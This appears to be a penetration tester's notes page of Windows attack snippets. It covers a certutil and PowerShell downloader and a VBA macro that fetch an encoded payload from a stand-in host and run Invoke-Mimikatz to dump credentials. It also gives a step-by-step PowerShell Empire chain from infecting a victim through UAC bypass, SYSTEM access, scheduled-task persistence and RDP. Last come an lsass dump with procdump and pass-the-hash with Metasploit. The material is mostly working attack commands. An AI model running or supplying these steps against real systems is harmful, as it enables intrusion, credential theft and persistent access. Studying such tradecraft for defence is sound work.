downloader certutil powershell invoke-mimikatz

sample downloader that executed mimikatz

certutil.exe -urlcache -split -f http://somewhere/test.txt 'test.txt';

$B64 = get-content test.txt ;

$clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64));

$clear |out-file -filepath 'test.txt';

powershell -version 2 -command "iex (get-content 'test.txt'|out-string);

Invoke-Mimikatz -DumpCreds

VBA Macro downloader invoke-mimikatz

Shell ("certutil.exe -urlcache -split -f http://somewhere/test4.txt ""tes5.txt""")

Shell ("powershell.exe -noprofile -command ""start-sleep -s 5; $B64 = get-content 'test.txt' ; $clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64)); $clear |out-file -filepath 'test.txt';""")

Shell ("cmd.exe /c ""c:\windows\sysnative\windowspowershell\v1.0\powershell.exe -version 2 -noprofile -noexit -command ""start-sleep -s 15; iex (get-content 'test.txt'|out-string); invoke-mimikatz -command 'token::whoami';""""")

Powershell Empire common path

Powershell Empire common path in a lab test environment

./empire

1.) setup a listener
listeners
userlistener http
execute

2.) create a stager
userstager multi/launcher
set Listener http
set OutFile /launcher.ps1

3.) setup web server to server malicious launcher
python -m SimpleHTTPServer 8000

4.) infect victim
have victim pc execute reach to attacker pc, download launcher.ps1, execute

5.) interact with agent
**you should see agent check-in as soon as step #4 above is complete
interact XXXXX
rename victim

6.) see where you are
sysinfo
whoami
pwd
info    (if HighIntegrity = 0 then regular user, if = 1 then admin)

7.) if not admin, find weaknesses
usemodule privesc/powerup/allchecks
execute

8.) if not admin, use a weakness (perhaps already admin just need uac bypass) to escalate to admin
usermodule privesc/bypassuac_env
set Listener http
execute

9.) interact with admin agent
** if it works, you should get new agent check-in immediately after step #8 that is admin**
interact XXXX
rename victimAsAdmin

10.) see where you are
whoami
info    (if HighIntegrity = 0 then regular user, if = 1 then admin)

11.) if admin, move to SYSTEM
usemodule privesc/getssystem
execute

12.) see where you are
whoami    (should says SYSTEM now)

13.) setup persistence as a scheduled task
usemodule persistence/userland/schtasks
set Listener http
set IdleTime 2
execute

14.) run mimikatz
mimikatz

15.) enumerate credential store
usemodule credentials/enum_cred_store
execute

16.) enable remote desktop
usermodule management/enable_rdp
execute

17.) remote desktop into the victim with credentials found

Lsass Dump Mimikatz Pass the Hash Basics

procdump -ma lsass.exe {path to where you want it dumped}\lsass.dmp

Mimikatz.exe
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonPasswords

Username : {user}
Domain     : {domain}
NTLM       : {NTLM Hash}

use auxillary/scanner/smb/smb_login
set SMBDomain {domain}
set SMBUser {user}
set RHOSTS {ip addr}
set SMBPass aad3b435b51404eeaad3b435b51404ee:{NTLM Hash}
run

good blog

https://blog.ropnop.com/practical-usage-of-ntlm-hashes/

When you can & cannot Pass the Hash

great blog

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

From a pentesting perspective:

• You CAN perform Pass-The-Hash attacks with NTLM hashes.
• You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.

You get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller's NTDS.dit database or from Mimikatz (Fun fact, although you can't get clear-text passwords from Mimikatz on Windows >= 8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that's perfectly fine: obviously you can still Pass-The-Hash with just the NT hash.

You get Net-NTLMv1/v2 (a.k.a NTLMv1/v2) hashes when using tools like Responder or Inveigh.